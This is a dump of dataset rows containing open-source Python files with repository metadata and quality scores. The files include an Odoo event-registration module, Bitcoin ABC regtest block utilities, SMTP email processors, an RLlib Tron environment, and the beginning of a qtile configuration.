max_stars_repo_path
stringlengths
4
286
max_stars_repo_name
stringlengths
5
119
max_stars_count
int64
0
191k
id
stringlengths
1
7
content
stringlengths
6
1.03M
content_cleaned
stringlengths
6
1.03M
language
stringclasses
111 values
language_score
float64
0.03
1
comments
stringlengths
0
556k
edu_score
float64
0.32
5.03
edu_int_score
int64
0
5
tools/idx/makeIDX.py
vehicle-lang/vehicle
9
6628951
# Small script for generating test IDX dataset files import idx2numpy import numpy as np xs = np.array([0.1,3,-2,-3.2]).astype('float32') f_write = open('datset.idx', 'wb') idx2numpy.convert_to_file(f_write, xs)
# Small script for generating test IDX dataset files import idx2numpy import numpy as np xs = np.array([0.1,3,-2,-3.2]).astype('float32') f_write = open('datset.idx', 'wb') idx2numpy.convert_to_file(f_write, xs)
en
0.486895
# Small script for generating test IDX dataset files
2.552104
3
website_event_attendee_fields/models/event_registration.py
RL-OtherApps/website-addons
0
6628952
# Copyright 2017-2018 <NAME> <https://it-projects.info/team/yelizariev> # License MIT (https://opensource.org/licenses/MIT). import logging from odoo import _, api, models _logger = logging.getLogger(__name__) class EventRegistration(models.Model): _inherit = "event.registration" @api.model def create(self, vals): partner_exists = False if vals.get("email"): Partner = self.env["res.partner"] email = vals.get("email").replace("%", "").replace("_", "\\_") partner_exists = Partner.search([("email", "=ilike", email)], limit=1) res = super(EventRegistration, self).create(vals) if res.attendee_partner_id: # be sure, that name and phone in registration are ones from Attendee, # because built-in modules take them from Partner (buyer) if ones are no presented res.name = res.attendee_partner_id.name res.phone = res.attendee_partner_id.phone if partner_exists: partner_vals = self._prepare_partner(vals) # Update attendee details, if user buys (register) ticket for himself # self.env.user is Administrator here, so just trust to partner_id field if res.attendee_partner_id == res.partner_id: res.attendee_partner_id.sudo().write(partner_vals) elif len(partner_vals) > 1: # If vals has more than email address # Add a note about posible problems with updating fields # FIXME partner_vals always has more than one field (e.g. event_ticket_id, origin, etc). # So, this message is always posted res.message_post( _( "Attendee partner record are not updated for security reasons:<br/> %s " ) % partner_vals ) return res @api.model def _prepare_attendee_values(self, registration): """Extend it to pass partner values too (we remove them later in _prepare_partner) we skip partner_id field to avoid email field overriding. """ data = super(EventRegistration, self)._prepare_attendee_values(registration) partner_fields = self.env["res.partner"]._fields data.update( { key: registration[key] for key in registration.keys() if key in partner_fields and key != "partner_id" } ) _logger.debug("_prepare_attendee_values: %s", data) return data def _prepare_partner(self, vals): """method from partner_event module""" event = self.env["event.event"].browse(vals["event_id"]) if not event.attendee_field_ids: # attendee_field_ids is not configure # May happen in tests of other modules, which don't suppose that this module is installed. # Just return super values. return super(EventRegistration, self)._prepare_partner(vals) # copy partner fields to return and removes non-registration fields from vals res = {} partner_fields = self.env["res.partner"]._fields _logger.debug("registration vals before removing: %s", vals) for field in event.attendee_field_ids: fn = field.field_name if field.field_model == "res.partner" or fn in partner_fields: # partner fields value = vals.get(field.field_name) if value: # Don't pass empty value, because it removes previous value. # E.g. when partner with email is specified and known fields are not filled at the form res[fn] = value if fn not in self._fields: # non-registration fields if fn in vals: del vals[fn] _logger.debug("registration vals after removing: %s", vals) _logger.debug("partner values: %s", res) return res
# Copyright 2017-2018 <NAME> <https://it-projects.info/team/yelizariev> # License MIT (https://opensource.org/licenses/MIT). import logging from odoo import _, api, models _logger = logging.getLogger(__name__) class EventRegistration(models.Model): _inherit = "event.registration" @api.model def create(self, vals): partner_exists = False if vals.get("email"): Partner = self.env["res.partner"] email = vals.get("email").replace("%", "").replace("_", "\\_") partner_exists = Partner.search([("email", "=ilike", email)], limit=1) res = super(EventRegistration, self).create(vals) if res.attendee_partner_id: # be sure, that name and phone in registration are ones from Attendee, # because built-in modules take them from Partner (buyer) if ones are no presented res.name = res.attendee_partner_id.name res.phone = res.attendee_partner_id.phone if partner_exists: partner_vals = self._prepare_partner(vals) # Update attendee details, if user buys (register) ticket for himself # self.env.user is Administrator here, so just trust to partner_id field if res.attendee_partner_id == res.partner_id: res.attendee_partner_id.sudo().write(partner_vals) elif len(partner_vals) > 1: # If vals has more than email address # Add a note about posible problems with updating fields # FIXME partner_vals always has more than one field (e.g. event_ticket_id, origin, etc). # So, this message is always posted res.message_post( _( "Attendee partner record are not updated for security reasons:<br/> %s " ) % partner_vals ) return res @api.model def _prepare_attendee_values(self, registration): """Extend it to pass partner values too (we remove them later in _prepare_partner) we skip partner_id field to avoid email field overriding. """ data = super(EventRegistration, self)._prepare_attendee_values(registration) partner_fields = self.env["res.partner"]._fields data.update( { key: registration[key] for key in registration.keys() if key in partner_fields and key != "partner_id" } ) _logger.debug("_prepare_attendee_values: %s", data) return data def _prepare_partner(self, vals): """method from partner_event module""" event = self.env["event.event"].browse(vals["event_id"]) if not event.attendee_field_ids: # attendee_field_ids is not configure # May happen in tests of other modules, which don't suppose that this module is installed. # Just return super values. return super(EventRegistration, self)._prepare_partner(vals) # copy partner fields to return and removes non-registration fields from vals res = {} partner_fields = self.env["res.partner"]._fields _logger.debug("registration vals before removing: %s", vals) for field in event.attendee_field_ids: fn = field.field_name if field.field_model == "res.partner" or fn in partner_fields: # partner fields value = vals.get(field.field_name) if value: # Don't pass empty value, because it removes previous value. # E.g. when partner with email is specified and known fields are not filled at the form res[fn] = value if fn not in self._fields: # non-registration fields if fn in vals: del vals[fn] _logger.debug("registration vals after removing: %s", vals) _logger.debug("partner values: %s", res) return res
en
0.863288
# Copyright 2017-2018 <NAME> <https://it-projects.info/team/yelizariev> # License MIT (https://opensource.org/licenses/MIT). # be sure, that name and phone in registration are ones from Attendee, # because built-in modules take them from Partner (buyer) if ones are no presented # Update attendee details, if user buys (register) ticket for himself # self.env.user is Administrator here, so just trust to partner_id field # If vals has more than email address # Add a note about posible problems with updating fields # FIXME partner_vals always has more than one field (e.g. event_ticket_id, origin, etc). # So, this message is always posted Extend it to pass partner values too (we remove them later in _prepare_partner) we skip partner_id field to avoid email field overriding. method from partner_event module # attendee_field_ids is not configure # May happen in tests of other modules, which don't suppose that this module is installed. # Just return super values. # copy partner fields to return and removes non-registration fields from vals # partner fields # Don't pass empty value, because it removes previous value. # E.g. when partner with email is specified and known fields are not filled at the form # non-registration fields
2.180532
2
src/vm-builder-0.12.4+bzr489/build/lib.linux-x86_64-2.7/VMBuilder/plugins/ubuntu/lucid.py
cryptorinium/Num2
0
6628953
<gh_stars>0 # # Uncomplicated VM Builder # Copyright (C) 2010 Canonical Ltd. # # See AUTHORS for list of contributors # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License version 3, as # published by the Free Software Foundation. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. # import os from VMBuilder.util import run_cmd from VMBuilder.plugins.ubuntu.karmic import Karmic class Lucid(Karmic): valid_flavours = { 'i386' : ['386', 'generic', 'generic-pae', 'virtual'], 'amd64' : ['generic', 'preempt', 'server', 'virtual'] } def divert_file(self, path, add): if add: action = "--add" else: action = "--remove" if not add: os.remove('%s/%s' % (self.context.chroot_dir, path)) run_cmd('chroot', self.context.chroot_dir, 'dpkg-divert', '--local', '--rename', action, path)
# # Uncomplicated VM Builder # Copyright (C) 2010 Canonical Ltd. # # See AUTHORS for list of contributors # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License version 3, as # published by the Free Software Foundation. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. # import os from VMBuilder.util import run_cmd from VMBuilder.plugins.ubuntu.karmic import Karmic class Lucid(Karmic): valid_flavours = { 'i386' : ['386', 'generic', 'generic-pae', 'virtual'], 'amd64' : ['generic', 'preempt', 'server', 'virtual'] } def divert_file(self, path, add): if add: action = "--add" else: action = "--remove" if not add: os.remove('%s/%s' % (self.context.chroot_dir, path)) run_cmd('chroot', self.context.chroot_dir, 'dpkg-divert', '--local', '--rename', action, path)
en
0.864228
# # Uncomplicated VM Builder # Copyright (C) 2010 Canonical Ltd. # # See AUTHORS for list of contributors # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License version 3, as # published by the Free Software Foundation. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. #
1.824994
2
test/functional/test_framework/blocktools.py
hackverket/bitcoin-abc
0
6628954
#!/usr/bin/env python3 # Copyright (c) 2015-2016 The Bitcoin Core developers # Distributed under the MIT software license, see the accompanying # file COPYING or http://www.opensource.org/licenses/mit-license.php. """Utilities for manipulating blocks and transactions.""" from .mininode import * from .script import CScript, OP_TRUE, OP_CHECKSIG, OP_RETURN, OP_PUSHDATA2, OP_DUP, OP_HASH160, OP_EQUALVERIFY from .mininode import CTransaction, CTxOut, CTxIn from .util import satoshi_round from .txtools import pad_tx # Create a block (with regtest difficulty) def create_block(hashprev, coinbase, nTime=None): block = CBlock() if nTime is None: import time block.nTime = int(time.time() + 600) else: block.nTime = nTime block.hashPrevBlock = hashprev block.nBits = 0x207fffff # Will break after a difficulty adjustment... block.vtx.append(coinbase) block.hashMerkleRoot = block.calc_merkle_root() block.calc_sha256() return block def serialize_script_num(value): r = bytearray(0) if value == 0: return r neg = value < 0 absvalue = -value if neg else value while (absvalue): r.append(int(absvalue & 0xff)) absvalue >>= 8 if r[-1] & 0x80: r.append(0x80 if neg else 0) elif neg: r[-1] |= 0x80 return r # Create a coinbase transaction, assuming no miner fees. # If pubkey is passed in, the coinbase output will be a P2PK output; # otherwise an anyone-can-spend output. def create_coinbase(height, pubkey=None): coinbase = CTransaction() coinbase.vin.append(CTxIn(COutPoint(0, 0xffffffff), ser_string(serialize_script_num(height)), 0xffffffff)) coinbaseoutput = CTxOut() coinbaseoutput.nValue = 50 * COIN halvings = int(height / 150) # regtest coinbaseoutput.nValue >>= halvings if (pubkey != None): coinbaseoutput.scriptPubKey = CScript([pubkey, OP_CHECKSIG]) else: coinbaseoutput.scriptPubKey = CScript([OP_TRUE]) coinbase.vout = [coinbaseoutput] # Make sure the coinbase is at least 100 bytes pad_tx(coinbase) coinbase.calc_sha256() return coinbase # Create a transaction. # If the scriptPubKey is not specified, make it anyone-can-spend. def create_transaction(prevtx, n, sig, value, scriptPubKey=CScript()): tx = CTransaction() assert(n < len(prevtx.vout)) tx.vin.append(CTxIn(COutPoint(prevtx.sha256, n), sig, 0xffffffff)) tx.vout.append(CTxOut(value, scriptPubKey)) pad_tx(tx) tx.calc_sha256() return tx def get_legacy_sigopcount_block(block, fAccurate=True): count = 0 for tx in block.vtx: count += get_legacy_sigopcount_tx(tx, fAccurate) return count def get_legacy_sigopcount_tx(tx, fAccurate=True): count = 0 for i in tx.vout: count += i.scriptPubKey.GetSigOpCount(fAccurate) for j in tx.vin: # scriptSig might be of type bytes, so convert to CScript for the moment count += CScript(j.scriptSig).GetSigOpCount(fAccurate) return count def create_confirmed_utxos(node, count, age=101): """ Helper to create at least "count" utxos """ to_generate = int(0.5 * count) + age while to_generate > 0: node.generate(min(25, to_generate)) to_generate -= 25 utxos = node.listunspent() iterations = count - len(utxos) addr1 = node.getnewaddress() addr2 = node.getnewaddress() if iterations <= 0: return utxos for i in range(iterations): t = utxos.pop() inputs = [] inputs.append({"txid": t["txid"], "vout": t["vout"]}) outputs = {} outputs[addr1] = satoshi_round(t['amount'] / 2) outputs[addr2] = satoshi_round(t['amount'] / 2) raw_tx = node.createrawtransaction(inputs, outputs) ctx = FromHex(CTransaction(), raw_tx) fee = node.calculate_fee(ctx) // 2 ctx.vout[0].nValue -= fee # Due to possible truncation, we go ahead and take another satoshi in # fees to ensure the transaction gets through ctx.vout[1].nValue -= fee + 1 signed_tx = node.signrawtransaction(ToHex(ctx))["hex"] node.sendrawtransaction(signed_tx) while (node.getmempoolinfo()['size'] > 0): node.generate(1) utxos = node.listunspent() assert(len(utxos) >= count) return utxos def mine_big_block(node, utxos=None): # generate a 66k transaction, # and 14 of them is close to the 1MB block limit num = 14 utxos = utxos if utxos is not None else [] if len(utxos) < num: utxos.clear() utxos.extend(node.listunspent()) send_big_transactions(node, utxos, num, 100) node.generate(1) def send_big_transactions(node, utxos, num, fee_multiplier): from .cashaddr import decode txids = [] padding = "1"*(512*127) addrHash = decode(node.getnewaddress())[2] for _ in range(num): ctx = CTransaction() utxo = utxos.pop() txid = int(utxo['txid'], 16) ctx.vin.append(CTxIn(COutPoint(txid, int(utxo["vout"])), b"")) ctx.vout.append(CTxOut(0, CScript( [OP_RETURN, OP_PUSHDATA2, len(padding), bytes(padding, 'utf-8')]))) ctx.vout.append( CTxOut(int(satoshi_round(utxo['amount']*COIN)), CScript([OP_DUP, OP_HASH160, addrHash, OP_EQUALVERIFY, OP_CHECKSIG]))) # Create a proper fee for the transaction to be mined ctx.vout[1].nValue -= int(fee_multiplier * node.calculate_fee(ctx)) signresult = node.signrawtransaction( ToHex(ctx), None, None, "NONE|FORKID") txid = node.sendrawtransaction(signresult["hex"], True) txids.append(txid) return txids
#!/usr/bin/env python3 # Copyright (c) 2015-2016 The Bitcoin Core developers # Distributed under the MIT software license, see the accompanying # file COPYING or http://www.opensource.org/licenses/mit-license.php. """Utilities for manipulating blocks and transactions.""" from .mininode import * from .script import CScript, OP_TRUE, OP_CHECKSIG, OP_RETURN, OP_PUSHDATA2, OP_DUP, OP_HASH160, OP_EQUALVERIFY from .mininode import CTransaction, CTxOut, CTxIn from .util import satoshi_round from .txtools import pad_tx # Create a block (with regtest difficulty) def create_block(hashprev, coinbase, nTime=None): block = CBlock() if nTime is None: import time block.nTime = int(time.time() + 600) else: block.nTime = nTime block.hashPrevBlock = hashprev block.nBits = 0x207fffff # Will break after a difficulty adjustment... block.vtx.append(coinbase) block.hashMerkleRoot = block.calc_merkle_root() block.calc_sha256() return block def serialize_script_num(value): r = bytearray(0) if value == 0: return r neg = value < 0 absvalue = -value if neg else value while (absvalue): r.append(int(absvalue & 0xff)) absvalue >>= 8 if r[-1] & 0x80: r.append(0x80 if neg else 0) elif neg: r[-1] |= 0x80 return r # Create a coinbase transaction, assuming no miner fees. # If pubkey is passed in, the coinbase output will be a P2PK output; # otherwise an anyone-can-spend output. def create_coinbase(height, pubkey=None): coinbase = CTransaction() coinbase.vin.append(CTxIn(COutPoint(0, 0xffffffff), ser_string(serialize_script_num(height)), 0xffffffff)) coinbaseoutput = CTxOut() coinbaseoutput.nValue = 50 * COIN halvings = int(height / 150) # regtest coinbaseoutput.nValue >>= halvings if (pubkey != None): coinbaseoutput.scriptPubKey = CScript([pubkey, OP_CHECKSIG]) else: coinbaseoutput.scriptPubKey = CScript([OP_TRUE]) coinbase.vout = [coinbaseoutput] # Make sure the coinbase is at least 100 bytes pad_tx(coinbase) coinbase.calc_sha256() return coinbase # Create a transaction. # If the scriptPubKey is not specified, make it anyone-can-spend. def create_transaction(prevtx, n, sig, value, scriptPubKey=CScript()): tx = CTransaction() assert(n < len(prevtx.vout)) tx.vin.append(CTxIn(COutPoint(prevtx.sha256, n), sig, 0xffffffff)) tx.vout.append(CTxOut(value, scriptPubKey)) pad_tx(tx) tx.calc_sha256() return tx def get_legacy_sigopcount_block(block, fAccurate=True): count = 0 for tx in block.vtx: count += get_legacy_sigopcount_tx(tx, fAccurate) return count def get_legacy_sigopcount_tx(tx, fAccurate=True): count = 0 for i in tx.vout: count += i.scriptPubKey.GetSigOpCount(fAccurate) for j in tx.vin: # scriptSig might be of type bytes, so convert to CScript for the moment count += CScript(j.scriptSig).GetSigOpCount(fAccurate) return count def create_confirmed_utxos(node, count, age=101): """ Helper to create at least "count" utxos """ to_generate = int(0.5 * count) + age while to_generate > 0: node.generate(min(25, to_generate)) to_generate -= 25 utxos = node.listunspent() iterations = count - len(utxos) addr1 = node.getnewaddress() addr2 = node.getnewaddress() if iterations <= 0: return utxos for i in range(iterations): t = utxos.pop() inputs = [] inputs.append({"txid": t["txid"], "vout": t["vout"]}) outputs = {} outputs[addr1] = satoshi_round(t['amount'] / 2) outputs[addr2] = satoshi_round(t['amount'] / 2) raw_tx = node.createrawtransaction(inputs, outputs) ctx = FromHex(CTransaction(), raw_tx) fee = node.calculate_fee(ctx) // 2 ctx.vout[0].nValue -= fee # Due to possible truncation, we go ahead and take another satoshi in # fees to ensure the transaction gets through ctx.vout[1].nValue -= fee + 1 signed_tx = node.signrawtransaction(ToHex(ctx))["hex"] node.sendrawtransaction(signed_tx) while (node.getmempoolinfo()['size'] > 0): node.generate(1) utxos = node.listunspent() assert(len(utxos) >= count) return utxos def mine_big_block(node, utxos=None): # generate a 66k transaction, # and 14 of them is close to the 1MB block limit num = 14 utxos = utxos if utxos is not None else [] if len(utxos) < num: utxos.clear() utxos.extend(node.listunspent()) send_big_transactions(node, utxos, num, 100) node.generate(1) def send_big_transactions(node, utxos, num, fee_multiplier): from .cashaddr import decode txids = [] padding = "1"*(512*127) addrHash = decode(node.getnewaddress())[2] for _ in range(num): ctx = CTransaction() utxo = utxos.pop() txid = int(utxo['txid'], 16) ctx.vin.append(CTxIn(COutPoint(txid, int(utxo["vout"])), b"")) ctx.vout.append(CTxOut(0, CScript( [OP_RETURN, OP_PUSHDATA2, len(padding), bytes(padding, 'utf-8')]))) ctx.vout.append( CTxOut(int(satoshi_round(utxo['amount']*COIN)), CScript([OP_DUP, OP_HASH160, addrHash, OP_EQUALVERIFY, OP_CHECKSIG]))) # Create a proper fee for the transaction to be mined ctx.vout[1].nValue -= int(fee_multiplier * node.calculate_fee(ctx)) signresult = node.signrawtransaction( ToHex(ctx), None, None, "NONE|FORKID") txid = node.sendrawtransaction(signresult["hex"], True) txids.append(txid) return txids
en
0.784314
#!/usr/bin/env python3 # Copyright (c) 2015-2016 The Bitcoin Core developers # Distributed under the MIT software license, see the accompanying # file COPYING or http://www.opensource.org/licenses/mit-license.php. Utilities for manipulating blocks and transactions. # Create a block (with regtest difficulty) # Will break after a difficulty adjustment... # Create a coinbase transaction, assuming no miner fees. # If pubkey is passed in, the coinbase output will be a P2PK output; # otherwise an anyone-can-spend output. # regtest # Make sure the coinbase is at least 100 bytes # Create a transaction. # If the scriptPubKey is not specified, make it anyone-can-spend. # scriptSig might be of type bytes, so convert to CScript for the moment Helper to create at least "count" utxos # Due to possible truncation, we go ahead and take another satoshi in # fees to ensure the transaction gets through # generate a 66k transaction, # and 14 of them is close to the 1MB block limit # Create a proper fee for the transaction to be mined
2.225386
2
colosseumrl/envs/tron/TronRllibEnvironment.py
carletonz/colosseumrl
8
6628955
import numpy as np from gym.spaces import Dict, Discrete, Box, Space from colosseumrl import BaseEnvironment from colosseumrl.envs.wrappers import RllibWrapper from . import TronGridEnvironment class TronRllibEnvironment(RllibWrapper): def create_env(self, *args, **kwargs) -> BaseEnvironment: return TronGridEnvironment.create(*args, **kwargs) def create_observation_space(self, *args, **kwargs) -> Space: num_players = self.env.num_players board_size = self.env.N return Dict({ 'board': Box(0, num_players, shape=(board_size, board_size)), 'heads': Box(0, np.infty, shape=(num_players,)), 'directions': Box(0, 4, shape=(num_players,)), 'deaths': Box(0, num_players, shape=(num_players,)) }) def create_action_space(self, *args, **kwargs) -> Space: return Discrete(3) def create_done_dict(self, state, players, rewards, terminal, action_dict): alive_players = set(map(str, players)) return {player: ((player not in alive_players) or terminal) for player in action_dict} def action_map(self, action): if action == 0: return 'forward' elif action == 1: return 'right' else: return 'left'
import numpy as np from gym.spaces import Dict, Discrete, Box, Space from colosseumrl import BaseEnvironment from colosseumrl.envs.wrappers import RllibWrapper from . import TronGridEnvironment class TronRllibEnvironment(RllibWrapper): def create_env(self, *args, **kwargs) -> BaseEnvironment: return TronGridEnvironment.create(*args, **kwargs) def create_observation_space(self, *args, **kwargs) -> Space: num_players = self.env.num_players board_size = self.env.N return Dict({ 'board': Box(0, num_players, shape=(board_size, board_size)), 'heads': Box(0, np.infty, shape=(num_players,)), 'directions': Box(0, 4, shape=(num_players,)), 'deaths': Box(0, num_players, shape=(num_players,)) }) def create_action_space(self, *args, **kwargs) -> Space: return Discrete(3) def create_done_dict(self, state, players, rewards, terminal, action_dict): alive_players = set(map(str, players)) return {player: ((player not in alive_players) or terminal) for player in action_dict} def action_map(self, action): if action == 0: return 'forward' elif action == 1: return 'right' else: return 'left'
none
1
2.637597
3
piped/processors/smtp_processors.py
alexbrasetvik/Piped
3
6628956
<filename>piped/processors/smtp_processors.py # Copyright (c) 2010-2011, Found IT A/S and Piped Project Contributors. # See LICENSE for details. from email import message from zope import interface from twisted.internet import defer from piped import util, processing, exceptions from piped.processors import base from piped.providers import smtp_provider class CreateEmailMessage(base.Processor): """ Creates an instance of :class:`email.message.Message`. """ interface.classProvides(processing.IProcessor) name = 'create-email-message' def __init__(self, output_path='message', payload_path=None, headers=None, **kw): """ :param output_path: The path in the baton where the :class:`email.message.Message` should be stored. :param payload_path: The path to the payload in the baton. :param headers: A dict of initial headers to set in the email message. Example: .. code-block:: yaml - create-email-message: ... headers: Subject: my-subject From: Sender Name <<EMAIL>> To: Recipient Name <<EMAIL>> """ super(CreateEmailMessage, self).__init__(**kw) self.output_path = output_path self.payload_path = payload_path self.headers = headers or dict() def process(self, baton): msg = message.Message() for key, value in self.headers.items(): msg.add_header(key, value) if self.payload_path: payload = util.dict_get_path(baton, self.payload_path) if hasattr(payload, 'read'): payload = payload.read() msg.set_payload(payload) if self.output_path == '': return msg util.dict_set_path(baton, self.output_path, msg) return baton class SetMessageHeaders(base.Processor): """ Set or replace message headers of an :class:`email.message.Message`. If the header already exists in the message, it will be replaced, otherwise it will be added. """ interface.classProvides(processing.IProcessor) name = 'replace-email-headers' def __init__(self, headers, message_path='message', **kw): """ :param message_path: The path to the :class:`email.message.Message` in the baton. :param headers: A :class:`dict` of headers and their values which should be set """ super(SetMessageHeaders, self).__init__(**kw) self.message_path = message_path self.headers = headers def process(self, baton): message = util.dict_get_path(baton, self.message_path) for key, value in self.headers.items(): if key in message: message.replace_header(key, value) else: message.add_header(key, value) return baton class SendEmail(base.Processor): """ Send an email. """ interface.classProvides(processing.IProcessor) name = 'send-email' def __init__(self, message_path='message', configuration=None, **kw): """ :param message_path: The path to the message in the baton. :param from: The email address of the sender. :param from_path: The path to the senders email address in the baton. Only one of ``from`` and ``from_path`` may be used. :param to: The email address of the recipient. :param to_path: The path to the recipients email address in the baton. Only one of ``to`` and ``to_path`` may be used. :param configuration: The configuration argument may contain arguments accepted by :meth:`~piped.providers.smtp_provider.send_mail`, except ``from_addr``, ``to_addr`` and ``file`` which is provided by this processor: .. automethod:: piped.providers.smtp_provider.send_mail :noindex: """ self.from_addr = kw.pop('from', None) self.from_path = kw.pop('from_path', None) self.to_addr = kw.pop('to', None) self.to_path = kw.pop('to_path', None) self._fail_if_from_to_not_properly_configured() super(SendEmail, self).__init__(**kw) self.message_path = message_path self.configuration = configuration or dict() def _fail_if_from_to_not_properly_configured(self): if (self.from_addr and self.from_path) or not (self.from_addr or self.from_path): e_msg = 'Invalid "from"-configuration.' detail = 'Either "from" or "from_path" must be used.' raise exceptions.ConfigurationError(e_msg, detail) if (self.to_addr and self.to_path) or not (self.to_addr or self.to_path): e_msg = 'Invalid "to"-configuration.' detail = 'Either "to" or "to_path" must be used.' raise exceptions.ConfigurationError(e_msg, detail) @defer.inlineCallbacks def process(self, baton): message = util.dict_get_path(baton, self.message_path) from_addr = self.from_addr if not from_addr: from_addr = util.dict_get_path(baton, self.from_path) to_addr = self.to_addr if not to_addr: to_addr = util.dict_get_path(baton, self.to_path) yield smtp_provider.send_mail(from_addr, to_addr, message, **self.configuration) defer.returnValue(baton)
<filename>piped/processors/smtp_processors.py # Copyright (c) 2010-2011, Found IT A/S and Piped Project Contributors. # See LICENSE for details. from email import message from zope import interface from twisted.internet import defer from piped import util, processing, exceptions from piped.processors import base from piped.providers import smtp_provider class CreateEmailMessage(base.Processor): """ Creates an instance of :class:`email.message.Message`. """ interface.classProvides(processing.IProcessor) name = 'create-email-message' def __init__(self, output_path='message', payload_path=None, headers=None, **kw): """ :param output_path: The path in the baton where the :class:`email.message.Message` should be stored. :param payload_path: The path to the payload in the baton. :param headers: A dict of initial headers to set in the email message. Example: .. code-block:: yaml - create-email-message: ... headers: Subject: my-subject From: Sender Name <<EMAIL>> To: Recipient Name <<EMAIL>> """ super(CreateEmailMessage, self).__init__(**kw) self.output_path = output_path self.payload_path = payload_path self.headers = headers or dict() def process(self, baton): msg = message.Message() for key, value in self.headers.items(): msg.add_header(key, value) if self.payload_path: payload = util.dict_get_path(baton, self.payload_path) if hasattr(payload, 'read'): payload = payload.read() msg.set_payload(payload) if self.output_path == '': return msg util.dict_set_path(baton, self.output_path, msg) return baton class SetMessageHeaders(base.Processor): """ Set or replace message headers of an :class:`email.message.Message`. If the header already exists in the message, it will be replaced, otherwise it will be added. """ interface.classProvides(processing.IProcessor) name = 'replace-email-headers' def __init__(self, headers, message_path='message', **kw): """ :param message_path: The path to the :class:`email.message.Message` in the baton. :param headers: A :class:`dict` of headers and their values which should be set """ super(SetMessageHeaders, self).__init__(**kw) self.message_path = message_path self.headers = headers def process(self, baton): message = util.dict_get_path(baton, self.message_path) for key, value in self.headers.items(): if key in message: message.replace_header(key, value) else: message.add_header(key, value) return baton class SendEmail(base.Processor): """ Send an email. """ interface.classProvides(processing.IProcessor) name = 'send-email' def __init__(self, message_path='message', configuration=None, **kw): """ :param message_path: The path to the message in the baton. :param from: The email address of the sender. :param from_path: The path to the senders email address in the baton. Only one of ``from`` and ``from_path`` may be used. :param to: The email address of the recipient. :param to_path: The path to the recipients email address in the baton. Only one of ``to`` and ``to_path`` may be used. :param configuration: The configuration argument may contain arguments accepted by :meth:`~piped.providers.smtp_provider.send_mail`, except ``from_addr``, ``to_addr`` and ``file`` which is provided by this processor: .. automethod:: piped.providers.smtp_provider.send_mail :noindex: """ self.from_addr = kw.pop('from', None) self.from_path = kw.pop('from_path', None) self.to_addr = kw.pop('to', None) self.to_path = kw.pop('to_path', None) self._fail_if_from_to_not_properly_configured() super(SendEmail, self).__init__(**kw) self.message_path = message_path self.configuration = configuration or dict() def _fail_if_from_to_not_properly_configured(self): if (self.from_addr and self.from_path) or not (self.from_addr or self.from_path): e_msg = 'Invalid "from"-configuration.' detail = 'Either "from" or "from_path" must be used.' raise exceptions.ConfigurationError(e_msg, detail) if (self.to_addr and self.to_path) or not (self.to_addr or self.to_path): e_msg = 'Invalid "to"-configuration.' detail = 'Either "to" or "to_path" must be used.' raise exceptions.ConfigurationError(e_msg, detail) @defer.inlineCallbacks def process(self, baton): message = util.dict_get_path(baton, self.message_path) from_addr = self.from_addr if not from_addr: from_addr = util.dict_get_path(baton, self.from_path) to_addr = self.to_addr if not to_addr: to_addr = util.dict_get_path(baton, self.to_path) yield smtp_provider.send_mail(from_addr, to_addr, message, **self.configuration) defer.returnValue(baton)
en
0.671739
# Copyright (c) 2010-2011, Found IT A/S and Piped Project Contributors. # See LICENSE for details. Creates an instance of :class:`email.message.Message`. :param output_path: The path in the baton where the :class:`email.message.Message` should be stored. :param payload_path: The path to the payload in the baton. :param headers: A dict of initial headers to set in the email message. Example: .. code-block:: yaml - create-email-message: ... headers: Subject: my-subject From: Sender Name <<EMAIL>> To: Recipient Name <<EMAIL>> Set or replace message headers of an :class:`email.message.Message`. If the header already exists in the message, it will be replaced, otherwise it will be added. :param message_path: The path to the :class:`email.message.Message` in the baton. :param headers: A :class:`dict` of headers and their values which should be set Send an email. :param message_path: The path to the message in the baton. :param from: The email address of the sender. :param from_path: The path to the senders email address in the baton. Only one of ``from`` and ``from_path`` may be used. :param to: The email address of the recipient. :param to_path: The path to the recipients email address in the baton. Only one of ``to`` and ``to_path`` may be used. :param configuration: The configuration argument may contain arguments accepted by :meth:`~piped.providers.smtp_provider.send_mail`, except ``from_addr``, ``to_addr`` and ``file`` which is provided by this processor: .. automethod:: piped.providers.smtp_provider.send_mail :noindex:
2.485154
2
.config/qtile/config.py
garywei944/eva_ubuntu
0
6628957
<filename>.config/qtile/config.py # Copyright (c) 2010 <NAME> # Copyright (c) 2010, 2014 dequis # Copyright (c) 2012 <NAME> # Copyright (c) 2012-2014 <NAME> # Copyright (c) 2012 <NAME> # Copyright (c) 2013 horsik # Copyright (c) 2013 <NAME> # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. from typing import List # noqa: F401 from libqtile import bar, layout, widget, qtile, hook from libqtile.config import Click, Drag, Group, Key, Match, Screen from libqtile.lazy import lazy import os import subprocess def 